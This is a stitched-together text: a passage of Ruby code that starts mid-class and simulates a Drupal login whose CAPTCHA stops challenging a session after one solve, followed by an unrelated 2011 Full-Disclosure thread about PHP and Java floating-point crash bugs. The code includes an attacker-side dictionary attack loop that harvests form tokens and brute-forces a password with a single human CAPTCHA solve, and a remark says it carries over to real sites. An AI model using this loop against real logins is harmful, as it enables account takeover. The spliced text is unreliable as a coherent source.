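  def human_solve(captcha_sid)
    @captcha_answers[captcha_sid]
  end

  # POST /user: returns [status, body].
  def post(session, params)
    return [400, 'invalid form_build_id'] unless @form_tokens.delete(params['form_build_id'])
    if params['captcha_sid']
      expected = @captcha_answers.delete(params['captcha_sid'])
      return [200, render(session)] unless expected && expected == params['captcha_response']
      @solved[session] = true
    elsif @persistence == ALWAYS_CHALLENGE || !@solved[session]
      return [403, 'captcha required']
    end
    if params['name'] == @user && params['pass'] == @password
      [302, 'Moved Temporarily']   # Drupal redirects on a successful login
    else
      [200, render(session)]       # form re-rendered; captcha omitted if persistence allows
    end
  end

  private

  def render(session)
    form_build_id = 'form-' + SecureRandom.hex(16)
    @form_tokens[form_build_id] = true
    html = %(<input type="hidden" name="form_build_id" value="#{form_build_id}" />)
    # The insecure default: no new challenge once this session solved one.
    unless @persistence == SKIP_ONCE_SOLVED && @solved[session]
      sid = SecureRandom.hex(16)
      @captcha_answers[sid] = rand(10..99).to_s
      @captchas_issued += 1
      html += %(<input type="hidden" name="captcha_sid" value="#{sid}" />)
    end
    html
  end
end

# Attacker side. Tokens are pulled from each response with a regex (the original
# PoC used nokogiri); each new form_build_id / captcha_sid feeds the next request.
def extract(body, name)
  body[/name="#{name}" value="([^"]+)"/, 1]
end

# Returns {found:, tried:, stalled:}; stalled means a challenge came back and the
# human budget was exhausted, i.e. the attack could not continue unattended.
def dictionary_attack(site, session, user, words, human_solves: 1)
  body = site.get_form(session)
  tried = 0
  words.each do |pw|
    params = { 'name' => user, 'pass' => pw, 'form_build_id' => extract(body, 'form_build_id') }
    if (sid = extract(body, 'captcha_sid'))
      return { found: nil, tried: tried, stalled: true } if human_solves.zero?
      human_solves -= 1
      params['captcha_sid'] = sid
      params['captcha_response'] = site.human_solve(sid)
    end
    status, body = site.post(session, params)
    tried += 1
    return { found: pw, tried: tried, stalled: false } if status == 302
  end
  { found: nil, tried: tried, stalled: false }
end

if __FILE__ == $0
  words = %w[test1 test2 test3 guessme]   # constructed wordlist
  [SKIP_ONCE_SOLVED, ALWAYS_CHALLENGE].each do |mode|
    site = FakeDrupalLogin.new(mode, 'admin', 'guessme')
    puts "#{mode}: #{dictionary_attack(site, 'sess1', 'admin', words)} captchas_issued=#{site.captchas_issued}"
  end
end
```

Against a real site the same loop needs the session cookie and a real solver or human for the first challenge, exactly as the advisory says; the simulation exists only to make the difference between the two persistence settings observable without a Drupal install.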

Re: [Full-disclosure] {Java,PHP} Server Exploits

2011-02-10 Thread Yorian Wiltjer
To all,

PHP version fixed in versions 5.3.5 and 5.2.17, released on Jan 6th 2011.
And the bug is only in the 32-bit version of PHP (even on a 64-bit CPU)
http://www.php.net/archive/2011.php#id2011-01-06-1

The Reg reports that Oracle fixed the mark of the beast in their new patch,
after it has been there for 10 years.
http://www.theregister.co.uk/2011/02/09/java_floating_point_bug_fixed/

PHP dev team time: one month
Java developers: about ten years

So yay open source.

With friendly greetings,
Yorian

PS,
Don't forget to upgrade

2011/2/10 Troy Aerojam 

> It borders idiocy this hasn't been plugged.
>
> Aerojam
>
> --- On *Wed, 2/9/11, Leon Kaiser * wrote:
>
>
> From: Leon Kaiser 
>
> Subject: [Full-disclosure] {Java,PHP} Server Exploits
> To: full-disclosure@lists.grok.org.uk
> Date: Wednesday, February 9, 2011, 5:40 PM
>
>
>
> http://developers.slashdot.org/story/11/02/09/025237/Java-Floating-Point-Bug-Can-Lock-Up-Servers
>
> http://it.slashdot.org/story/11/01/06/1820208/PHP-Floating-Point-Bug-Crashes-Server
>
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/